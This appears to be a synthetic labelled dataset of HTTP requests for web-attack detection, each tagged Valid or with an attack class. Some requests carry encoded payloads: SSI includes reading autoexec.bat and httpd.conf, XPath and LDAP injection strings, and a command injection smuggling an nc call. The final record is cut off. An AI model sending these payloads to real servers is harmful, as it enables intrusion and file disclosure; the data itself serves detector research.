Upgrade: oeEul/3.4, B6ened/3.9, oRoC/0.7
Warning: 763 212.227.140.5:8348 "gddLcd3eaoscn8iho" 
X-Forwarded-For: 27.26.79.206
X-Serial-Number: 296173
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18246
Start - Id: 8906
class: Valid
GET /iouy.5as4/atdemAh/ruNkLIJmdarRhSX3/dh4wH8lM.cstgKh/WtvtqeNiuh3tlhseeess/hO.gif? HTTP/1.0
Host: 222.30.82.107
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic, us-ascii;q=0.1, x-mac-chinesetrad;q=0.8, hz-gb-2312;q=0.3, x-mac-roman;q=0.5
Accept-Encoding: deflate, deflate, compress;q=0.7, identity, deflate
Accept-Language: evzah-8h5tmoio, Y-nnts7;q=0.8, rl-itcdwex;q=0.0
Cache-Control: yal='iEHEa'
Client-ip: 178.118.114.226
Cookie: 6ZN9tEfjhwn=eoptvbscripteu;asiennftg=6f >gumyd~sle? n;hisi=82
Cookie2: $Version="266"
Date: Sat, 19 Mar 05 02:01:59 UTC
ETag: "o_YERB0dpVOt2YXC"
Expect: 100-continue
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Mon, 12 Mar 07 01:15:35 GMT
If-Unmodified-Since: Thu, 02 Aug 07 19:06:11 UTC
If-Match: *
If-None-Match: "J41NEoiNYYC_GZ7b"
If-Range: Sun, 14 Jan 07 15:00:50 GMT
Max-Forwards: 8
MIME-Version: 7.9
Pragma: epd=ycltEys
Proxy-Authorization: NTLM ZGVuZDRtZ2hyY3Jub29ld3RhZWZoZnBrc0E5T2NNZWVtcGlheGdIbEllUm1la2Rn
Authorization: nadne hanc8oO=t0e1m
Range: 195341-892,301-417,85-
Referer: /uledeta7.exe
TE: chunked;q=0.4,trailers,trailers
Trailer: Trailer
User-Agent: ptyR (iCKRQgVx)
UA-CPU: 68000
UA-Disp: 012,690,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 000x5970
Via: HTTP/8.3 145.159.52.95
Transfer-Encoding: deflate
Upgrade: ne7b/6.5
Warning: 504 www.w3oroz9y.htm "acttofeQ52Va9c" 
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 266699
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8906
Start - Id: 25605
class: Valid
GET /om7iiw/c5/ADts3Lctwvihe5hpsdaz/tps5hesqNe/tsgDefwmeWfar3l.tiff? HTTP/1.1
Host: www.oaNst6l.org:236
Connection: keep-alive
Accept: image/*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.4, identity
Accept-Language: e8nlFzH-eqoI, N0oEeji-e, yv1nttt-eaeakr7, grdt-aasohrdm, e-iohip
Cache-Control: no-store
Client-ip: 70.74.10.34
Cookie: U2UFbKE6XU=t E
Cookie2: $Version="0"
Date: Fri, 25 Sep 09 19:58:46 UTC
ETag: W/"-vFLLiCYGnZ.bQ_2Uxwx"
Expect: raIu=iti3lrr
From: ofler@wmho0ac.it
If-Modified-Since: Thu, 15 Sep 05 10:23:15 CET
If-Unmodified-Since: Mon, 06 Jun 05 13:20:22 CET
If-Match: *
If-None-Match: "tB07WXtPOk2kPUXuXjRl"
If-Range: "m1gN@tY99yw.uwtM"
Max-Forwards: 625
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: y7Leo nhelo=fiaeie
Authorization: Basic dGNpbjp0ZXN0YQ==
Range: 286-,8185-
Referer: /ceib1/nox4/daeun/e8wi/nmetkign.php
TE: gzip;q=0.3,deflate;q=0.1
Trailer: Cache-Control
User-Agent: mdWm8r (s5nTXV.; uF5yWNq3G8; pwNiG-; o08Pvq8)
UA-CPU: 68000
UA-Disp: 8439,526,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1157x6904
Via: 2.1 89.215.244.152
Transfer-Encoding: compress
Upgrade: 1ri/9.8, wbhp/8.4
Warning: 650 136.91.203.255 "ymolni9b19rts" 
X-Forwarded-For: 255.93.182.143
X-Serial-Number: 10779920705093
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25605
Start - Id: 34893
class: Valid
PUT /snrhCD41wLSx/afVzTk/oNErOpc7rQr/1yte/p-IZn/9CQOwWs872s7/iQ2Nr/eljuOVWcRJEreCL/lOC2TSvTOt.SM/eGuDC39rS/htokI/ntNbw33o.y0-.css? HTTP/1.0
Content-Length: 168
Content-Language: tfbm,r,iij1eAe
Content-Encoding: gzip
Content-Location: /npeiUi/YtvitnMt.jpg
Content-MD5: bnJhdDVodGljMmVhOG11YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 May 08 22:45:12 CET
Last-Modified: Fri, 29 Apr 05 05:49:23 CET
Host: www.5steglh.com:3910
Connection: close
Accept: application/*;q=0.7, text/html
Accept-Charset: *
Accept-Encoding: *
Accept-Language: d4tii-tolVe, 0xfifw-erdateeu;q=0.0
Cache-Control: no-transform
Client-ip: 148.13.5.11
Cookie: o8owo0=5852
Cookie2: $Version="9"
Date: Fri, 12 May 06 16:21:52 CET
ETag: "v_aeITxqGo4O3-8k2YwZ"
Expect: 100-continue
From: aioNe@o85EoEesvN.org
If-Modified-Since: Tue, 19 Jul 05 18:28:52 CET
If-Unmodified-Since: Wed, 14 Mar 07 19:44:38 UTC
If-Match: "VujQqFMHTokHh.3F9ulC"
If-None-Match: "Zj@Hh34l@Us3uhyvGUrU"
If-Range: "e2vk9np6.6EwFJ3i"
Max-Forwards: 207
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest nc=72e2B70C
Authorization: Basic eXRpcHV2Om5PYTY=
Range: 817-
Referer: /E1ewisD.png
TE: deflate;q=0.6,trailers
Trailer: Trailer
User-Agent: Mozilla/7.8 (Windows; U; WinNT 3.5; 5P-wn; rv:5.5.5) Gecko/95744963
UA-CPU: MIPS
UA-Disp: 559,503,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0430x9866
Via: 5.8 134.170.216.163, HTTP/8.9 188.240.22.174, 5.9 165.228.220.165
Transfer-Encoding: deflate
Upgrade: minhlz/2.0, gtr/0.2, nusiot/8.5
Warning: 984 www.5sli.jpeg "inisbLIlrtinx" 
X-Forwarded-For: 240.255.196.104
X-Serial-Number: 77838287681504099212
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ktMeodaee=0&twpz=ludbNnAgheezeqeesa&PanodeWmm5=woao&Dnntu1tyd=44&erlsGo=~ O1&p1xstudeea6mh=96&itSsiqsNnea=xi&nnaia=0735&td65rsnhs=527&prhnhaud=ntd~&8spditsgnsnn=2eq

End - Id: 34893
Start - Id: 40619
class: SSI
GET /D4q-JX2-/fPbwy7w6LjCH4m5X/mWh1hc57XW/-Wdocumentdocumentv4vbscriptB4Wwp-/deojctemnssmirss/iSBladminmnk0p/nHwB/ytinrtlx/inhzzxsLyhlUtd/nrTgmm.jpg?A1WCv3=08970&eyeaIhLcpn=4087&zuinclude7=io&l6Oasrs=96244&dn9eqalnobmgri=24323114&mi9gasire=%3C%21--++++%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E HTTP/1.1
Host: www.D49e0.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: h-nkdeY;q=0.4, hseocad-o;q=0.0, Mueeel-g1, d06slidI-ieert
Cache-Control: no-store
Cookie2: $Version="07"
Date: Tue, 19 Oct 04 23:54:07 GMT
ETag: "BSYbTuX7wGz5Vkk"
If-Unmodified-Since: Tue, 17 Feb 09 16:31:52 UTC
If-Match: "hiv8GOeXfHXt3lr.3wy"
If-None-Match: "xfyccxVZX8PEhqBW"
Max-Forwards: 2
MIME-Version: 5.0
Pragma: no-cache
Authorization: syo0to xxevNu=56isuKo
Range: 656012-5
Referer: /scthl/oIye/ygedi.pdf
TE: gzip
Trailer: Upgrade
User-Agent: Mozilla/8.6 (Machintosh; U; PPC 6.7; t5-6k; rv:2.5.4) Gecko/31406946
Via: FTP/1.3 7.4.108.62
Transfer-Encoding: gzip
Upgrade: eItzhe/6.5, bifw/0.8, 2hwep/5.5, nRdrN/1.5, ncnna/4.9
Warning: 308 68.164.17.248 "itScteuheeanafg" 
X-Serial-Number: 5234187897202701

null

End - Id: 40619
Start - Id: 1020
class: Valid
GET /eRaig.js?ovyhEa=rt&x5.kCVZO1=10811&xTgrcp=snoaucrimaANf&ttsytdeiiebc4T=qXuBj9&Naehrar=74245 HTTP/1.1
Host: www.Beree.de
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.0, gzip;q=0.9
Accept-Language: T-ohsa;q=0.7, e0-btrtu, oel-2S;q=0.8, yilqetf-pl;q=0.2
Cache-Control: max-age=341
Client-ip: 147.230.207.208
Cookie: Eles5=oWk@HeyiA;plnNjs=8mdlHab
Cookie2: $Version="1"
Date: Sat, 09 Oct 04 11:25:23 GMT
ETag: "guQP-vgLmi_nEuJ8"
Expect: eiBh=zY66;as3us
From: iyiqd@OJte.cz
If-Modified-Since: Sat, 01 Mar 08 13:57:44 GMT
If-Unmodified-Since: Sat, 08 Jan 05 20:43:30 UTC
If-Match: *
If-None-Match: *
If-Range: "wjCipmjEuTpZWScM"
Max-Forwards: 375
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic aXNqdWU6b2hhZWlhc2M=
Authorization: Basic cnNzbDQ6NmFTN2Q=
Range: 860-5184,-519,255763-
Referer: /tosvxk/at7ehit/1drnhs/9yrta.pl
TE: trailers
Trailer: If-Modified-Since
User-Agent: raeosanacj (nsz4gaLAnV; eneoXDh; u5uLiW; iLjzc8BZ)
UA-CPU: x86
UA-Disp: 108,3114,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5033x777
Via: FTP/2.0 255.198.14.74:4, 0.3 14.220.107.136, 2.4 www.eoofa58q.tiff
Transfer-Encoding: deflate
Upgrade: Rhhtb/3.6, ren/5.0, rt9em/3.6, nixTd/5.6, oeeAEo/3.8
Warning: 626 www.sIhu.js:02385 "3Foepetu3EnniiehE" "Sun, 13 Feb 05 14:48:31 UTC"
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 90115734669182651364
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 1020
Start - Id: 14701
class: Valid
GET /hw1u/d9lnataie/oTheci1/8Rem4ybHfrdrj/lZ/nt89n/acliya8nawhformftrh/6iarhutly0MxehoRrre/tinu6rcasemcT0iz/pI7zcIIJWZ/dle4NKli.-DYv47/9He5xdrar@o1I.cgi? HTTP/1.0
Host: www.csn3.cz
Connection: keep-alive
Accept: image/*
Accept-Charset: iso-10646-ucs-2, iso-8859-6, windows-1255, big5;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: min-fresh=2
Client-ip: 153.53.214.61
Cookie: ceucdo=]wheremh; D0hv;Q7KeQx=an3diutraflhae1Jy;So=issaDplas;dAgFFiDMHLM==@eirsg|;tWoeanwannb=4023172
Cookie2: $Version="410"
Date: Wed, 20 Aug 08 10:34:23 CET
ETag: "JEq72OW.VJM4Kw6Ig"
Expect: Huhnan3
From: ew4dDBs@eoeatshefo.uk
If-Modified-Since: Thu, 06 Aug 09 02:23:17 UTC
If-Unmodified-Since: Tue, 13 Nov 07 17:30:50 GMT
If-Match: *
If-None-Match: "XSE.i5cJrBGRUKwG-"
If-Range: *
Max-Forwards: 4
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://tett.ch/tulLjgt.swf
Authorization: Basic NjhvZTJkbzpmaXRzaXV1
Range: 07-
Referer: http://www.etlaa.be/mrNoofii/fmTloae/nrtd.pl
TE: trailers,chunked;q=0.8
Trailer: If-None-Match
User-Agent: Mozilla/8.3 (Machintosh; U; PPC Mac OS X 6.5; ao-as; rv:0.1.8) Gecko/36620161
UA-CPU: x86
UA-Disp: 8733,634,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 0368x227
Via: 2.5 www.lebaue.tiff
Transfer-Encoding: compress
Upgrade: tyeor/5.2, e6I/9.1, ae8a/2.1
Warning: 558 www.ronb.png:85114 "eteaQlei6Imtxieuee" 
X-Forwarded-For: 185.24.81.76
X-Serial-Number: 5935364150091795
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 14701
Start - Id: 49569
class: XPathInjection
GET /nKTtG/em9uj-hiklayWo/liyteDopi5ipdu/oBHY7mi9IGaqIHXazS8I/3Qa-M5BFr/exevaCQbUwkZF/o0DaLL7it7MCQTCaFzOQ/pscriptQncjBGL/YgmY.IS4on/aJfXiq/sO@1nZK4XO-W3-p-.exe?1e=vse%27++or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or++%27saaaair%27%3D%27 HTTP/1.1
Host: 182.248.122.142
Connection: Bah4Ns9
Accept: */*;q=0.2
Accept-Charset: windows-1250
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: a='o'
Client-ip: 244.186.225.107
Cookie: NshutdownZhP=8562;Fttr6eh1wlw2iI=991065
Cookie2: $Version="6"
Date: Sat, 15 Nov 08 18:04:18 GMT
ETag: W/"RwlbG4OPwxlnRS2"
Expect: rai8lT=iouvqGee;fouiTcye=n37l
From: i5aux@ablaftejic.be
If-Modified-Since: Wed, 12 Dec 07 10:38:53 UTC
If-Unmodified-Since: Sun, 21 Aug 05 20:54:40 UTC
If-Match: "lMf3_lfv-awJc@89w@"
If-None-Match: *
If-Range: "Bpnd_edwkpzv@Ji956"
Max-Forwards: 045
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: eeftuo sfagt=srres
Authorization: Digest realm
Range: -351866,-996363,00-
Referer: http://www.iitnr.biz/nrsh65/tHhiP/a8inrtts.txt
TE: trailers
Trailer: Range
User-Agent: Mozilla/3.9 (X11; U; Linux i386 4.2; tu-as; rv:1.1.8) Gecko/36510791
UA-CPU: Sparc
UA-Disp: 979,7479,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9192x115
Via: eso/3.0 154.226.69.16, HTTP/8.8 www.ypltEa.jpeg
Transfer-Encoding: 0bec; yErt=8T3mApj
Upgrade: opGee/0.6, iij/9.1, thIez/8.7
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 4750592519886658439
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49569
Start - Id: 36985
class: LdapInjection
GET /cyeoicndzednoL7/2aaniOuOiceekte4Esed/metaYQif1co8NxKxwwget.php?scnlnMacoed4ent=h&Hretovx7ro=oedweAnyusaieh&reihbnqS2=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&sbsndeitatwts=fvsgs&yavCq=ty%40BT6u-&iutufslabeea=05382&rtchonpe9=45 HTTP/1.0
Host: www.voAtres4e.ch
Connection: close
Accept: video/*, image/*;q=0.1
Accept-Charset: x-mac-roman, iso-8859-8;q=0.2, iso-8859-15;q=0.2, x-mac-arabic, us-ascii
Accept-Encoding: 
Accept-Language: m-iinazt
Cache-Control: min-fresh=63579
Client-ip: 155.94.191.185
Cookie: imscriptO21YtCH-=g
Cookie2: $Version="555"
Date: Thu, 18 Dec 08 12:38:05 UTC
ETag: W/"b3wJsWqNGTEe1_j"
Expect: 100-continue
From: 4t9lsozn@n1ns8ofqic.ch
If-Modified-Since: Tue, 05 Apr 05 12:42:11 GMT
If-Unmodified-Since: Fri, 18 Aug 06 02:46:42 CET
If-Match: "IzFNbc6@GagBlT7wW"
If-None-Match: *
If-Range: Tue, 09 May 06 04:27:01 GMT
Max-Forwards: 0366
MIME-Version: 4.9
Pragma: aoloet='ro4uy'
Proxy-Authorization: Digest nonce
Authorization: Basic YVJlcnpkOnRkY2JoZA==
Range: 84-,-422477,1197-5319
Referer: http://www.nhHe.org/easeho/Aunt7ylo/sraesone/reis/ee70a12.msf
TE: chunked
Trailer: Max-Forwards
User-Agent: v0Upnr/1.0
UA-CPU: MIPS
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 391x727
Via: 3.2 www.onermn1l.png:2294
Transfer-Encoding: compress
Upgrade: m2cnia/0.2, h1ebb/7.9
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Forwarded-For: 159.94.130.144
X-Serial-Number: 0781389574649
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36985
Start - Id: 30213
class: Valid
GET /arrTMtllRb/2e/47SyXZVG1_LW_dqs8a-w/sqlnSFj--l6oCkATk.htm?si1c8olskDt=ieuBteY&joiel=779&teeOfanz2=liidl&wPvar@8=nieeoa&ozltmpYz=objectdocumentt%2Fvbscriptp HTTP/1.1
Host: 36.254.152.192
Connection: jTatca
Accept: application/*, image/png, audio/x-wav;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=383
Client-ip: 15.120.71.38
Cookie: eu72tii8Nacuo=s@npbeMT.A7;6ettUt8EmtO=eghs;sn=arn2teahumaE60me8r;b7kegigmhacL=u;fsihqeibhjdlekm=lEou
Cookie2: $Version="21"
Date: Sat, 15 Jan 05 09:48:59 UTC
ETag: W/"GmsUi8tlrlwJp5@w"
Expect: 100-continue
From: earth@kdnEdty.biz
If-Modified-Since: Mon, 13 Feb 06 23:00:50 UTC
If-Unmodified-Since: Thu, 26 Aug 04 16:04:07 CET
If-Match: *
If-None-Match: *
If-Range: "qpArCk6AWiMMAnE@j_"
Max-Forwards: 1
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM ZmNUdDhvY0FhaGFyRWJnY3pqdXM1bm4xOTJ1b2NveWZlOGg=
Range: 346642-698,469-394,8-
Referer: http://eSgpaen.com/ftToa/RvmFp8o/smnitt/siIsa/sf9icInd.asmx
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/7.8 (X11; U; SunOS sun4u 5.8; Lo-n0; rv:9.9.5) Gecko/93366358
UA-CPU: x86
UA-Disp: 058,5611,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8300x7095
Via: 4.8 www.le7o.tiff:88484, HTTP/2.6 www.aeyefaP.png:7612
Transfer-Encoding: gzip
Upgrade: beith2/0.5, Nfr/4.5, a7Do/7.7
Warning: 771 181.119.169.184:84 "ceiue5imcozmnplEe" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 19194011026
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30213
Start - Id: 39640
class: SSI
GET /pEemcmreobi.png?ufiae=%3C%21--++++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++++--%3E&bepx0ierg=85646036 HTTP/1.0
Host: www.7aFmbc.st
Connection: eos1
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 96.129.208.142
Cookie: j59gAit4ento=4;msoudT=dooeAwy7nc5dsett
Cookie2: $Version="2"
Date: Tue, 07 Feb 06 06:43:48 CET
ETag: W/"vYrhlBgxRcANvEX21"
Expect: 100-continue
From: ae07on@oist3.org
If-Modified-Since: Sun, 11 Nov 07 23:43:13 GMT
If-Unmodified-Since: Tue, 14 Sep 04 02:11:09 GMT
If-Match: "5649_BVinmGcR92K"
If-None-Match: "p2I.-tjfa.t25jpE"
If-Range: Wed, 17 Sep 08 12:56:30 CET
Max-Forwards: 5
MIME-Version: 9.0
Pragma: efer04=sm
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: atn9di slo8mnac=aileO
Range: -3
Referer: http://8ntrnhet.com/H5rctfg/8iebo/geNwee/a5ktc.mp3
TE: trailers,gzip;q=0.0
Trailer: Authorization
User-Agent: Mozilla/0.4 (Windows; U; WinNT 5.7; y1-2n; rv:3.7.2) Gecko/96429569
UA-CPU: PowerPC
UA-Disp: 749,540,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2034x6396
Via: 9.8 www.nxdsog.jpeg:792, 8.1 179.52.196.3, 6.8 21.9.135.254:153
Transfer-Encoding: identity
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39640
Start - Id: 13686
class: Valid
GET /6kW.@Sv1F30Iw-/lnkKuBUT8/FHc4/9qF1FSlocationVMH4K2W4/a@pH4PyO3C4mtX/sl_sb0SIkH4Xbi/beAhciyeoserte/ankyB/untmLndEeatnogkeze/yu02lGieies3t3rnncm.jpg? HTTP/1.0
Host: 113.190.86.31
Connection: 8miti
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 230.127.50.78
Cookie: p8id3tui=rtNur8coheuitlnh;NJOqdqtKADx0=61272;yheeycl=uHKdPb1e8.r-;ri2roz=tZzeVu
Cookie2: $Version="4"
Date: Fri, 01 Jan 10 19:53:47 UTC
ETag: "r9hc6qc.ObpsPh1J"
Expect: 100-continue
From: oo7g4l@pAu9fultst.biz
If-Modified-Since: Fri, 31 Oct 08 23:51:55 GMT
If-Unmodified-Since: Wed, 15 Mar 06 05:41:35 UTC
If-Match: "6gfP-lFeoCkf.JIwVy"
If-None-Match: *
If-Range: Wed, 25 Jun 08 09:07:15 UTC
Max-Forwards: 44
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: s0oiHh O7Mzit=q03lD
Range: -922184,573-
Referer: /sagt2mre.mspx
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/5.4 (Machintosh; U; PPC Mac OS X 1.0; 6R-ih; rv:3.7.1) Gecko/82518582
UA-CPU: Sparc
UA-Disp: 2040,5971,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x935
Via: mp0u/0.9 www.tnfrwlen.htm, 8.6 112.187.22.59, 6.7 www.erg7s.css
Transfer-Encoding: deflate
Upgrade: ztst8/6.0, emn/7.0, die/9.5
Warning: 757 36.29.209.66 "rvr2" 
X-Forwarded-For: 145.31.187.12
X-Serial-Number: 712968195066290810
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13686
Start - Id: 43177
class: OsCommanding
GET /1u9tsvLp.php3?6lg3Ax=950169&nircSead=tRXcVq&etheyimj=%250a++++nc+www.neri.com++80+++++%3B&bhtnei3tHeAe=78161&pmrhhcoeahq=+%3B&Airn8muxalwLy=9&nt=ahVR3V&nei=aopv4vlllsMbcniE&cJg4rtoDrmlXG=etJ%7Ct9%2BYMeae HTTP/1.1
Host: 226.228.204.241:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: gzip
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 101.140.81.249
Cookie: vEenuoand4oogSe=Eeq2se6telnet;9l1i1ct=otoy7xce;iaOEtt=08467;eeu5ohlh=3001891
Cookie2: $Version="734"
Date: Tue, 05 Aug 08 22:16:42 UTC
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: spog@iutmqee.net
If-Modified-Since: Sat, 24 Jun 06 21:10:37 CET
If-Unmodified-Since: Sun, 01 Feb 04 16:25:21 CET
If-Match: "5_q@3@49fMZut0yT"
If-None-Match: "9G-r3zudstkL2b4S"
If-Range: Sun, 05 Feb 06 11:33:15 CET
Max-Forwards: 0791
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: coloIh rs8x9a=2Iwcett
Authorization: Digest nc=18ba3c0A
Range: 332370-1588,656-95
Referer: http://8N7Trc.com/A0Tfe.sh
TE: trailers,deflate;q=0.3,trailers
Trailer: Authorization
User-Agent: ot1dtsl
UA-CPU: Sparc
UA-Disp: 1503,1276,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 953x846
Via: tie/9.3 38.211.133.187
Transfer-Encoding: Fote
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 415 2.136.43.50 "wzmsseuobh" "Mon, 09 Jul 07 20:41:04 CET"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43177
Start - Id: 4585
class: Valid
POST /ooqaeig/ozc4eiw5/dtQfa/Mk8XncPlrtLRTE.cfm? HTTP/1.1
Content-Length: 130
Content-Language: s,sl9ezh,rorebpi
Content-Encoding: deflate
Content-Location: /ty9ta/nrptbcrr/jebhwy/iro2fhrh.jsp
Content-MD5: cjhyaTNoaGFsRW9zZGFscg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 01 Dec 04 05:54:01 UTC
Last-Modified: Sun, 03 Sep 06 14:15:55 UTC
Host: 51.244.208.116
Connection: close
Accept: */*
Accept-Charset: euc-tw;q=0.2, koi8-r;q=0.5, euc-kr;q=0.0, cp-932;q=0.8, windows-1255;q=0.7
Accept-Encoding: *
Accept-Language: znselnn-yulede, YN-g2ajnMf;q=0.2, itaTdofm-bdes, iteala-tlaseJ;q=0.3
Cache-Control: only-if-cached
Client-ip: 159.41.146.40
Cookie: sVya1el=i]eg1kt ngautoexecyad;tn=6841778;7oe2vo=Eosloinat;KEGwindow.openiG=te8iboot.ini;iael5oNild=viftnvsT;cogtans=script
Cookie2: $Version="02"
Date: Fri, 09 Feb 07 11:12:11 UTC
ETag: W/"RdQBopYM5-B.4Wjp"
Expect: Ioowfsh=eukgain6
From: a5wn@h3Rit.be
If-Modified-Since: Sat, 09 Oct 04 24:53:39 GMT
If-Unmodified-Since: Thu, 24 Apr 08 02:42:01 UTC
If-Match: "zTOFcpNW9Q4Q-6BFDf"
If-None-Match: *
If-Range: Thu, 03 Sep 09 08:48:11 GMT
Max-Forwards: 64
MIME-Version: 6.2
Pragma: t='spulhsa'
Proxy-Authorization: qkktsv 2oai=91eto
Authorization: Basic c2ZRdGRyOmhlbHd1TDJs
Range: -6763
Referer: http://6rie.st/iard/htiait/eenetse/ragQ/tycdd.tiff
TE: trailers,deflate;q=0.5,trailers
Trailer: Transfer-Encoding
User-Agent: 3rpraAma (sDX8UKTRs; kzxRnr)
UA-CPU: StrongARM
UA-Disp: 067,349,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1436x3813
Via: 5.5 www.secztCr.gif, 8.5 236.198.68.109
Transfer-Encoding: compress
Upgrade: ixu/5.5
Warning: 520 www.1weN3tt.js "tnnre9haoghuxhIda3e" "Fri, 07 May 04 09:34:48 CET"
X-Forwarded-For: 210.240.131.9
X-Serial-Number: 9967522166
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

dj8oegecefderli=488898&daans=fAn&ptCelu=lgcGB&sneabei=mOycl-R_lNdJ&tt=H7ta &nMm=5678930&2t8u8Sl7Iz7mZa=1c&dsnf&rOveluu=roNietnna

End - Id: 4585
Start - Id: 3416
class: Valid
GET /jgTPcGT7kKz3wwVU/ab9OKMyLsOtF/niios.asp?svs=jImxp90n HTTP/1.0
Host: www.rsnlsWlSn.ch:0187
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: hS-hnm;q=0.9
Cache-Control: no-cache
Client-ip: 222.148.241.66
Cookie: thh8e=nXqGBxjk;fne=dee;fyjq=aeF)3;aaedThswr6tosB=2774
Cookie2: $Version="79"
Date: Tue, 13 Apr 10 23:02:53 GMT
ETag: "B8PqqlwzNgyqvrX8CK"
Expect: hdenqd
From: tcne@mneudneS.biz
If-Modified-Since: Sat, 06 Mar 04 06:57:53 UTC
If-Unmodified-Since: Sat, 03 Jul 04 02:19:12 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 29 Nov 09 22:58:02 UTC
Max-Forwards: 9829
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic bzFvdDpjYWlIMnRz
Authorization: utosLg iytlelei=c2u6tf
Range: 03774-3
Referer: http://b7hdtoi.be/oe4l/b4oophs/d5aee/ioqica/2xnr.wav
TE: deflate,deflate;q=0.7,deflate
Trailer: Date
User-Agent: 9Iera (eXpeAs; zb_AIcxdlk; 3X08gM@7z0; cZ@T3Ku@E)
UA-CPU: StrongARM
UA-Disp: 3995,5069,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 969x7653
Via: 2.0 129.13.125.65
Transfer-Encoding: compress
Upgrade: rdse/9.1, lomd/5.7
Warning: 682 122.84.45.120 "hiq8gwIlahfmhHa" 
X-Forwarded-For: 185.226.136.192
X-Serial-Number: 80963840971
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 3416
Start - Id: 20975
class: Valid
GET /ZL/XYJex.t/eVmSOF5plPxheQ/rDcKnode0nph-H/objectO57jp8VSf5NqxmlD/positionT0ufWew/etgittcbgtjeeko/oiwpnnYmrffee.pl?o_nwfpU84e=exeuIrs&ghIeeapEnRlrl=lMn1KC_mkf&dghtesO=nevalhg&HoJBGoCJhE_Q=Tc4yeAh HTTP/1.1
Host: 74.203.158.221
Connection: keep-alive
Accept: audio/*;q=0.1, application/zip;q=0.2, image/gif;q=0.4
Accept-Charset: x-mac-icelandic, iso-8859-15
